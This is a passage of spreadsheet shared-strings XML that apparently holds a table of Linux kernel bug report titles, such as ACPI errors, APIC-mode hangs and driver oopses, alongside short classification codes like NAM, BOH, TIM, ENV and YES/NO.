    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAU</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PPC still has uptime readings of 12000+ days</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Request for Scsi_Host configurable CMD TimeOut per HBA</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>System was crashed during hammerhead/apache test (Kernel Oops happened)</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>modprobe pcnet32 (no card) then ns83820 (card present) causes oops</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>file system directory could not be accessed during the stress run directed against a partition  that is SAMBA FS</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>STO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAU</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LTP ustat tests break in 2.6.0-test2-mm1</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>non fatal ACPI errors on boot - AE_AML_REGION_LIMIT - Tyan 440BX/PIIX4</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>nForce2 hangs in APIC mode, works in PIC mode</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAU</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MEM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>packet capturing using PACKET_RX_RING does not work as expected</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>parport_pc not releasing all ioports</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>system hang in APIC mode when we install SuSe 9.0 beta 3 on VIA platform</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARU</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>We should use _SxD to determine highest power D-state in Sx Sleeping state</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MEM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MEM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>STO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>When pressing *once* PrintScreen on my PC keyboard it is reported thrice to xev and my window manager which is very anoying!</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAU</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>USB-storage with Sony PEG Mass Storage</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>oops in psmouse_reconnect after Suspend to disk (ACPI S4/swsusp)</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAU</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>SEQ</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>button driver calls remove_proc_entry() on a directory that is not empty</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>powermac alsa sound driver has superflous "enable"</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NUM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>acpi is unable to see my battery - thinks there is no battery when there is</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>SEQ</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TOT</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAU</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Hardlock running hdparm on kernel  linux-2.6.5-mm6 (nforce2)</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAU</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>REGRESSION</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
